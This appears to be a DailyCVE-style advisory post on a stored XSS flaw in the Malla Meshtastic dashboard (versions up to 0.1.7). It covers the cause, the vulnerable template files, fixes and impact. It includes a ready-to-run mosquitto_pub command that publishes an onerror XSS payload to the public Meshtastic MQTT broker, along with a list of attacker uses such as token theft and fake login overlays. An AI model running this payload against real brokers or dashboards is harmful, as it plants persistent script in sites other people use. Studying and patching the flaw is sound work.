Listen to this Post
How It Works
The Malla dashboard collects Meshtastic network data by subscribing to public MQTT brokers. When a node announces itself, it sends a `NODEINFO_APP` message that contains two text fields, `long_name` and short_name. In vulnerable versions of Malla (≤0.1.7), these incoming node names are written directly into an SQLite database without any sanitisation or escaping. Later, when the dashboard displays the node list, map markers, packet details or traceroute graphs, the same unsanitised strings are injected into the Document Object Model (DOM) – again without being escaped or filtered.
An attacker who can publish a packet to a public Meshtastic MQTT broker (which is open by default) can set either `long_name` or `short_name` to a malicious HTML/JavaScript payload, for example <img src=x onerror=alert(1)>. The Malla capture process (malla-capture) will store that payload in the SQLite database, and from there it is served to every visitor of the dashboard. Because the payload is not properly encoded before being inserted into the DOM, the browser interprets it as active code and executes it in the context of the dashboard’s origin.
The vulnerable code is spread across several front‑end components:
– `src/malla/templates/traceroute_graph.html` (line ~832)
– `src/malla/templates/map.html` (lines ~945 and 1078)
– `src/malla/templates/packet_detail.html` (lines ~1402 and 1452)
– `src/malla/static/js/relay_node_analysis.js` (line ~124)
The attack is persistent (stored XSS) and unauthenticated; any MQTT participant – regardless of whether they are a legitimate node – can inject the payload. Once stored, the malicious code is delivered to every dashboard visitor without further interaction. The dashboard does not implement a Content Security Policy (CSP), so an attacker can load arbitrary external scripts, create phishing overlays, force redirects to malicious sites, or continuously overload the user’s browser resources, effectively breaking the dashboard for all users.
DailyCVE Form
Platform: Malla dashboard
Version: ≤0.1.7
Vulnerability :Stored XSS
Severity: MODERATE
date: 2026‑06‑03
Prediction: 2026‑06‑03
What Undercode Say
1. Connect to a public Meshtastic MQTT broker and send a malicious NODEINFO packet
mosquitto_pub -h mqtt.meshtastic.org -p 1883 -t "msh/US/2e/json/STATUS" -m '{
"type": "NODEINFO_APP",
"payload": {
"long_name": "<img src=x onerror=alert(1)>",
"short_name": "XSS"
}
}'
2. Wait for malla-capture to store the packet (usually a few seconds)
sleep 5
3. Open the Malla dashboard and observe the persistent XSS trigger
firefox http://localhost:8080
Expected outcome – every page that displays node information (e.g. the node list, map, packet detail, relay analysis) will show an alert box. The payload remains active until the malicious node name is removed from the database or the application is patched.
Exploit
An attacker only needs MQTT write access to a public broker. The steps are:
1. Craft a malicious `NODEINFO_APP` packet with `long_name` containing a JavaScript payload.
2. Publish it to any topic that will be captured by Malla (the default MQTT subscription covers all node‑announce messages).
3. Wait for the Malla capture process to store the packet in SQLite.
4. Access the dashboard – the payload executes automatically when the page loads or when a user navigates to a vulnerable component.
Because the stored payload is not filtered or escaped, any DOM‑based JavaScript can be executed. Attackers can:
– Inject external scripts to steal cookies, session tokens, or API keys.
– Overlay a fake login form to harvest credentials.
– Use `window.location` to redirect visitors to a malicious clone of the dashboard.
– Continuously create DOM elements or make XHR requests to degrade performance (DoS).
The absence of CSP means there are no browser‑level restrictions on which resources the payload may load or which actions it may perform.
Protection
- Immediate upgrade – Update to Malla version 0.1.8 or later, which properly sanitises node names before storage and escapes all output in templates.
- If an upgrade is not possible –
- Manually escape output in the four vulnerable template/JavaScript files listed above (e.g. replace `{{ node.long_name }}` with `{{ node.long_name | escape }}` in Jinja2).
- In
relay_node_analysis.js, use `textContent` instead of `innerHTML` or apply `DOMPurify.sanitize()` before inserting node names. - Network‑level mitigation – Block untrusted MQTT brokers or restrict Malla’s MQTT subscription to a trusted, private broker that does not accept arbitrary publishing.
- Add a Content Security Policy – Even after fixing the injection points, a strict CSP (e.g.
script-src 'self') can prevent arbitrary script execution if any future injection re‑emerges.
Impact
- Confidentiality – The attacker can read all data accessible to the dashboard’s origin (local storage, session tokens, internal API responses).
- Integrity – The malicious script can modify the dashboard in real time (e.g. alter displayed data, inject fake nodes, or change settings).
- Availability – A persistent DoS attack can break the dashboard for every user by, for example, repeatedly spawning `alert()` loops or overloading the browser with massive DOM manipulations.
- Attack surface – Because Malla is often used by network administrators and researchers, a successful XSS can lead to further compromise of the underlying Meshtastic network if session credentials are stolen and reused.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
